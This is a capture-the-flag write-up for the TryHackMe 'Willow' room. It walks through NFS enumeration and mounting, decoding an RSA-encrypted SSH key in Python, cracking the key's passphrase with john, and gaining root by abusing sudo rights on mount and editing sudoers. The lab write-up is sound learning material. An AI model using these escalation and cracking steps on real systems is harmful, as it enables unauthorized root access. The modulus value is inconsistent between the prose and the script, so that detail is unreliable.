Hello N1NJ10, Today we will talk about tryhackme medium challenge called Willow it’s very good for whom love cryptography, coding, creativity, and Privilege Escalation.
Let’s start N1NJ10
First, let’s see if we can reach our target with the ping command, After that we will make a port scanning with NMAP
nmap -T4 -Pn --disable-arp-ping -A -n -sV -p- <IP>
Ok, we seem have HTTP server and NFS protocols here let’s start with HTTP
Note : what is NFS protocol , rpcbind and how to exploit them
seems like HexaDecimal let’s copy this text
Then identify what does it say with CyberChef
It said you know where is the decryption key is, Maybe there is something in NFS files we can access
showmount -e <IP> 
There is a failsafe dir let’s mount it
mount -t nfs -o vers=2 <IP>:/var/failsafe ./play/ -o nolockexplain : -t for the service , vers for version , <IP>:/var/failsafe the file path on the server , ./play/ the place i wanna the file to be saved on my PC and -o nolock — Disables file locking. This setting is occasionally required when connecting to older NFS servers
I opened the dir and get the file called rsa_keys
First i don’t understand what is this sh*t mean i try to find any solution for this puzzle but with no avail, unitl i find that there is hint in the firt question
After reading this amazing article i understand how to solve this puzzle, I found couple of solutions
Frist one Without any tiredness, We have the private key and n=37625 , d=61527 , So we have all schema parameters (encrypted_key^ d % n) = private_key
I found this website that can solve this schema to us
Let’s but our parameters
Now we get our private key
the second one is to build a python script make this for us
numric_private_key = "2367 2367 2367 2367 2367 9709 8600 28638 18410 1735 33029 16186 28374 37248 33029 26842 16186 18410 23219 37248 11339 8600 33029 35670 8600 31131 2367 2367 2367 2367 2367 14422 26842 9450 14605 19276 2367 11339 33006 36500 4198 33781 33029 11405 5267 8600 1735 17632 16186 31131 26842 11339 8600 35734 14422 35734 8600 35670 2367 18410 35243 37438 14605 33781 33029 37248 8600 28374 2367 22149 27582 3078 2367 17632 9709 17632 5267 27582 8600 27582 23721 11405 13256 33985 37248 18278 33985 27582 26775 23721 26775 27582 22149 3078 3078 9709 11405 33985 18278 17632 37248 37248 33443 8600 18278 18278 27582 18330 13256 14422 14422 28061 10386 23219 10386 3339 25111 22053 21889 31131 33856 3339 16186 28061 7496 14605 22149 5851 35243 11339 33985 35243 22872 33443 33856 33443 22149 33856 8452 11339 7568 22053 22149 3947 29609 9709 35243 5851 11405 18199 13256 33215 33985 7568 33215 12244 5444 22053 14605 10386 7496 33215 3339 9709 10386 21889 8452 28061 28374 8499 12792 18199 20172 19276 8499 14422 22102 19396 12244 28061 23721 8452 27582 5851 19276 28374 12244 23721 26775 28374 18199 35243 13256 28927 23219 35243 35734 3339 33215 3339 22149 36500 14605 21404 27582 1735 35243 28638 12792 7496 27582 28061 33856 33856 28927 7568 11339 37438 37438 8452 3078 28374 28638 3339 9709 28927 28638 35243 19276 35734 4198 7914 18278 8600 37248 9709 18199 19276 20172 22149 14422 5444 11339 7496 12792 28638 7568 18199 29655 35243 21889 18199 12792 20172 31131 21404 20172 37248 33443 22053 21889 11339 7358 11339 21889 25111 5851 17632 21404 8499 12244 27582 21889 7496 37438 37248 21889 35734 33215 12244 8499 23219 18199 12792 31131 35670 12244 28638 37248 28927 28374 1735 4198 19396 8600 8600 27582 17632 20172 23219 29609 27582 8499 26775 27582 14422 13256 18199 9709 29609 1735 8600 20172 28638 7568 28927 35734 8600 18410 3339 7496 19276 3078 22149 29655 18278 18278 17632 31131 7568 31131 7358 11405 9450 8452 22053 9450 13256 33856 7914 8452 36500 17632 7358 3947 33215 28638 11339 18278 35734 28374 23721 11339 5444 29609 27582 17632 33215 22872 21889 18199 3078 11339 17632 5444 33006 8452 28374 33215 8499 14422 28374 33856 12244 35670 22149 10386 36500 22102 12244 7568 5444 11405 26775 13256 11339 31131 20172 2950 7358 16186 21889 33215 3339 8499 7568 23219 22053 35670 33006 29655 22872 23721 23787 35243 26842 7568 26775 19396 12244 19396 3947 27582 10386 7496 27582 35734 33215 5444 33856 29655 20172 12244 14605 25111 2950 23787 8499 28061 3947 21404 18199 31131 7358 18330 14422 28061 3078 21889 22872 28927 33985 13256 33443 35734 8499 37248 8499 22102 18278 19396 33985 9450 26775 28374 11339 14605 31131 22872 12792 25111 8499 7914 18410 28061 25111 23219 8600 33215 22149 11405 33985 9709 2950 7358 17632 28374 11339 18199 8499 7358 33215 12244 27582 18199 14605 22102 28374 7358 3947 26842 27582 8600 18199 8600 18330 27582 18330 28927 22053 14422 22053 22053 33443 33006 5851 11339 35670 33215 18199 21889 33006 31131 27582 3339 7914 7496 13256 26775 31131 7496 26775 35670 19276 3947 23721 31131 3947 33006 36500 26775 19396 12792 5444 11339 7358 17632 7496 14605 36500 28638 8452 35670 21889 22149 19276 33856 7568 4198 3078 37248 12244 33985 8452 18330 9709 7358 9709 18330 22102 25111 7358 10386 7914 7358 14422 31131 16186 3078 26775 22149 1735 21889 9709 18278 18410 18410 29655 5851 18199 26842 22053 28374 19396 33443 21889 22872 26842 7496 11339 8499 22102 33985 28927 5851 36500 14605 28927 31131 36500 26842 28638 29609 28374 12244 9709 1735 7358 37248 22102 33985 23219 1735 23219 35670 33006 4198 16186 29609 22053 28061 37438 7358 22053 8452 26842 18330 7914 35670 26842 14422 29655 3078 5851 8600 21404 33215 16186 5851 29655 17632 27582 35734 35670 23787 18278 35670 22872 5851 21404 8452 3339 20172 18278 7496 7358 36500 19396 33006 17632 10386 10386 8452 28638 29609 9709 22053 3947 27582 26775 21889 22149 37248 7496 18330 3078 7568 18199 12792 7358 37438 36500 36500 37438 22149 18278 31131 19396 22149 18278 33215 3947 35670 18330 35670 14422 10386 8452 35243 37438 3078 28927 19396 37248 1735 33985 22149 21404 29609 29655 4198 37438 28374 35734 14605 8600 17632 18278 7496 28638 9709 4198 12244 25111 8452 8452 22149 18330 23219 11339 19396 35243 23787 3947 27582 22149 33856 7568 8600 18330 33443 14605 33215 1735 29609 26775 37438 4198 3947 18199 18330 31131 3078 17632 36500 33443 9709 35670 8452 11405 14422 28638 5851 35243 31131 10386 33856 8452 11405 35734 3339 3947 19276 28061 28638 8600 23721 9450 21889 28638 18199 23219 1735 18199 21404 3339 11405 5851 8600 22149 11339 28374 18410 3947 13256 9450 11405 22872 37438 4198 5851 12244 18199 22053 9450 18278 21889 18410 18199 4198 11339 22053 23219 18410 33985 27582 26842 22872 25111 17632 4198 18199 28374 19396 12244 14422 12244 33215 3947 27582 12244 28374 12244 22872 8600 1735 5444 28374 22053 18278 7568 14605 8499 21404 21404 23787 33856 18199 9450 11405 35734 28374 20172 29609 28061 10386 18410 35243 28061 29609 26775 3947 33985 3947 7568 5851 5851 5444 21889 35734 9450 19396 28927 8600 18199 14605 18199 4198 18278 31131 33006 23219 8452 33985 3339 23219 33856 33443 5851 4198 14422 18278 18278 33006 8452 2950 19396 33215 20172 33215 18410 33443 33856 28374 31131 31131 1735 1735 37438 3339 3947 3078 10386 3947 22149 4198 4198 21889 27582 18199 7568 3339 8499 14605 7568 20172 12244 33985 18330 19276 2950 19396 23787 33215 7496 33443 21889 8600 2950 3339 22872 35243 8600 19276 23721 8600 12244 18330 11405 1735 21404 5444 3339 21889 18410 14422 35734 18199 8600 20172 23219 1735 18199 23721 28638 31131 21889 29609 27582 7568 20172 17632 3339 14605 28638 12244 13256 19396 33215 23219 3078 19276 20172 23219 11339 28374 35734 8499 7496 12244 1735 3339 33985 37438 3947 29609 18278 12244 7358 29655 1735 18278 37248 8452 7358 1735 18278 7496 3339 33856 28061 8499 11339 37248 26842 23787 33215 18410 22149 11339 14422 9709 8499 29609 22149 25111 35734 28374 33443 21404 21889 28927 33443 4198 19276 35670 7568 33006 12244 7358 23219 3947 29655 20172 35243 14605 8452 28638 3078 21889 29655 35734 9450 28927 28927 23219 11405 35734 26842 33006 11339 33215 19396 35243 7496 36500 4198 9709 5851 28061 36500 28374 1735 4198 7914 7358 11405 7358 29655 8452 21404 11339 18199 7568 22149 14422 26842 17632 5851 35734 22872 37438 9709 8499 8600 37248 8600 37248 3947 8452 37438 20172 8600 22149 14605 22872 8499 7358 1735 5444 23787 33006 18278 20172 2950 20172 35670 35243 3078 28374 5851 26775 22872 4198 33985 37438 2950 21889 7496 8600 9709 20172 26842 7568 26842 1735 28374 22872 9450 8600 18199 5851 28927 28061 11405 29609 22053 22872 28374 12792 14422 22053 7358 8600 33006 22872 7914 3947 37248 21404 11339 35243 18199 35734 23721 7914 33215 21889 18278 33856 13256 8600 14605 20172 22102 11405 22149 7496 29655 9450 4198 9709 10386 27582 28374 33443 3339 12244 31131 28927 25111 26775 33215 33215 37248 7914 9709 35243 35734 33856 22872 35243 27582 33856 13256 31131 33856 37248 22102 28374 13256 33443 18278 33443 19396 14422 1735 22053 13256 37248 33006 11405 19396 21889 7914 21404 37438 31131 29609 21889 23721 3947 33985 14605 23219 3339 12244 8452 20172 35734 14605 8499 35243 3339 17632 33215 33985 3078 33856 1735 31131 28061 28061 2950 35734 23219 7496 35734 3947 27582 22149 25111 7568 22149 21889 16186 7496 14605 31131 21404 28374 8499 27582 37438 3947 7568 21404 17632 8499 7496 14422 37248 7358 23721 3078 26775 13256 36500 28927 29609 8600 23787 5444 5851 21889 33856 8452 16186 29609 29609 33443 18199 17632 20172 35734 4198 22102 33856 9709 22872 5851 5444 8452 9450 29609 4198 16186 8600 8600 33856 23787 22872 37248 23721 5851 3339 22872 23219 3947 18278 5444 23219 29655 7358 36500 28374 29655 7496 4198 22872 7358 18330 31131 18410 3339 14422 7358 21404 5851 33006 10386 7358 28927 11405 7568 33856 22102 20172 37248 11405 5851 7496 12792 35243 11339 23219 1735 22149 5851 35670 18330 23219 37248 7496 5851 18410 10386 25111 3078 21889 10386 23787 23219 10386 37438 19276 8452 35670 36500 3339 3339 7568 22102 36500 12244 28638 5444 37438 29655 7358 9450 19276 22053 4198 33985 33985 7496 33215 29655 5851 14422 7358 18330 33856 28374 26842 3947 7568 37248 2950 26775 12244 8499 2950 36500 33006 7914 5851 7358 8452 9450 28927 29655 5851 23219 33006 1735 36500 23721 7496 33856 22053 10386 3078 8600 28638 22053 11405 20172 33985 28638 2950 3339 12792 10386 35734 23787 33006 28374 9709 17632 7914 22102 19276 29609 18330 21404 33443 23787 18278 8452 36500 35734 28638 21889 14422 3947 21889 33985 1735 37438 3078 11405 27582 18278 35734 33006 3947 7914 37248 8452 28374 22872 37248 7568 14605 29609 35734 18278 9709 29655 5851 19396 35243 37438 12244 7568 7914 22149 5444 11405 29655 1735 9450 22053 35243 28061 18199 35243 14605 29609 25111 29609 21404 20172 21404 28927 13256 28061 3339 8600 7914 3947 1735 19276 33215 8600 33856 11405 4198 14422 22872 13256 36500 33006 35734 29655 37248 3078 28927 14605 13256 12792 5851 11339 11339 29655 18330 5444 33856 33443 22872 23721 25111 9450 7358 18330 33006 22102 28638 4198 19276 33985 9450 8499 13256 3078 5444 11339 33985 20172 18278 29655 35734 31131 12244 26842 37248 11405 33443 19396 22053 23219 36500 9450 7496 37248 21889 35734 18278 33006 33856 4198 16186 11405 14422 2950 18278 21404 7358 28061 33443 16186 35734 37438 12792 23721 18410 23721 25111 33443 7358 22872 28374 3078 33006 17632 35670 33443 18330 36500 18330 33856 26842 21404 28374 37438 28061 20172 17632 33985 1735 35734 7358 33215 1735 3339 3947 37438 12792 21889 18330 37438 33215 18278 3947 36500 7568 35670 9709 31131 29609 31131 19396 23787 19276 8452 36500 5851 11405 14422 11339 28927 18199 33443 25111 31131 11405 3339 12244 5444 35243 8600 7358 23787 37248 21889 8600 9450 9450 12244 3947 23787 37438 3947 33985 7358 37248 8452 22872 35734 7358 28061 19396 9709 8452 7914 11405 27582 5851 21404 25111 8499 29609 22149 4198 18278 29609 7358 12792 27582 36500 4198 35243 17632 29609 23721 37438 3947 35243 14605 37438 12244 19396 19276 14422 2367 2367 2367 2367 2367 8600 1735 35734 33029 16186 28374 37248 33029 26842 16186 18410 23219 37248 11339 8600 33029 35670 8600 31131 2367 2367 2367 2367 2367".split(" ")
n,d= [37627,61527]
clear_text_private_key = ""
for group in numric_private_key :
Ascci = (int(group) ** d) % n
clear_text_private_key+= chr(Ascci)
print (clear_text_private_key)
"""
if you don't understand this code try to understand this frist
text=[78,49,78,74,49,48]
key=""
for i in text:
key+=chr(i)
print(key)
"""Try to run it online with this website here , give it a shot
Will we now have the private key , So let’s try to access the machine with it first
ssh -i private_key willow@<IP>
It seems that we must have the passphrase key to get in , I prefer John to make this task
Note: you should change the access permission with chmod 600 private_key to success
ssh2john private_key > paraphrase.txt
john --wordlist=usr/share/wordlists/rockyou.txt paraphrase.txt paraphrase.txt
Note: don’t make my fault and forget the = sign this screen will appear if you make that mistake
Good , we now have the passphrase let’s get in
Now we are in , Let’s find our user flag
We find that there is a user.jpg file we can’t open it in the victim machine so i decide take a copy to my machine
scp -i private_key willow@<IP>:user.jpg
Open it
Let’s get the root account i found that we have have privilege on mount command under dev dir
sudo -l
So i go to GTFOBins to search if i can privilege my escalation
Give it a shot
mount -o bind /bin/sh /bin/mount
Ok let’s make it manually
cp ../../bin/bash ../../dev/shm/
sudo /bin/mount /dev/shm/bash /bin/mount -o force,bind
echo "bash" > /dev/shm/shell
sudo /bin/mount /dev/shm/shell Note : why i use shm ? /dev/shm is a temporary file storage filesystem (see tmpfs ) that uses RAM for the storage. It can function as shared memory that facilitates IPC. It is a world-writeable directory. The size of /dev/shm is limited by excess RAM on the system, and hence you’re more likely to run out of space on this filesystem so it mean we should have access on it
Pingo we have the root account, Let’s open the root flag
I can’t understand what happen here ??
After a while i understand that i think out of the box and get the root account in the way that the author don’t wanna , So i esclate the willow privilage acocunt by edit the sudoers file
Now we can start over again with willow account
After while i found that there is a hidden dir in dev called “hidden_backup”
So i mounted it to my path to get what inside it
mkdir N1NJ10
sudo mount /dev/hidden_backup N1NJ10/
cd N1NJ10/
ls -la
cat creds.txt
Ok this is the right way the author wanna us to think, But we doesn’t reach the root flag !!
I think again about his massage “I actuall gave you the root flag some time ago” , I remember that we get the user.jpg he maybe put a secret massage on it let’s see it with steghide
steghide info user.jpg 
Well , it have file called root.txt you can access this with passphrase the root password
Let’s extract it
steghide extract -sf user.jpg
cat root.txt
Pingo , We have the root flag now
Now you finish N1NJ10 I hope you have benefited from this writeup , If any something doesn’t make sense you can reach me on social media
I enjoyed the room, and would post more future walkthroughs for TryHackMe rooms and other security stuff in the future.
